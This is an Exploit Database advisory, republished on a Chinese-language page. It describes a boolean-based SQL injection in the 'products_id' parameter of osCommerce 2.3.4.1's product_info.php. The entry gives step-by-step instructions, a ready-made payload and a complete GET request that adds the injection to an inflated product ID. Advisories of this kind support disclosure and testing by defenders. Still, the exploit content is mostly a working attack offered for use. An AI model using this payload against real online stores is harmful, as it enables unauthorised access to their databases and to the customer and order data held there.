osCommerce 2.3.4.1 – ‘products_id’ SQL Injection

• Exploit Database
• 20 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-02-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46329/

• ####################################################################
  
  # Exploit Title: osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities
  # Dork: N/A
  # Date: 05-02-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://www.oscommerce.com
  # Software Link: https://www.oscommerce.com/Products
  # Version: 2.3.4.1
  # Category: Webapps
  # Tested on: Wampp @Win
  # CVE: N/A
  # Software Description: osCommerce Online Merchant is a complete online
  store solution
  that contains both a shop frontend and an administration backend
  which can be easily configured and customized with over 8,855 free
  add-ons.
  
  ####################################################################
  
  # Vulnerabilities / Impact
  # This web application called as osCommerce 2.3.4.1 version.
  # Switch to the product_info tab. Replace the ID value in the url, with a
  high number value.
  for example product_info.php?products_id=1 change to 9999999
  then add the payload at Attack_pattern to the end of the url.
  
  ####################################################################
  
  # POC - SQL (Boolean Based)
  # Parameters : products_id
  # Attack Pattern : oR 1811160=1811160 aNd 7193=7193
  # GET Request :
  http://localhost/oscommerce/catalog/product_info.php?products_id=99999999
  oR 1811160=1811160 aNd 7193=7193
  
  ####################################################################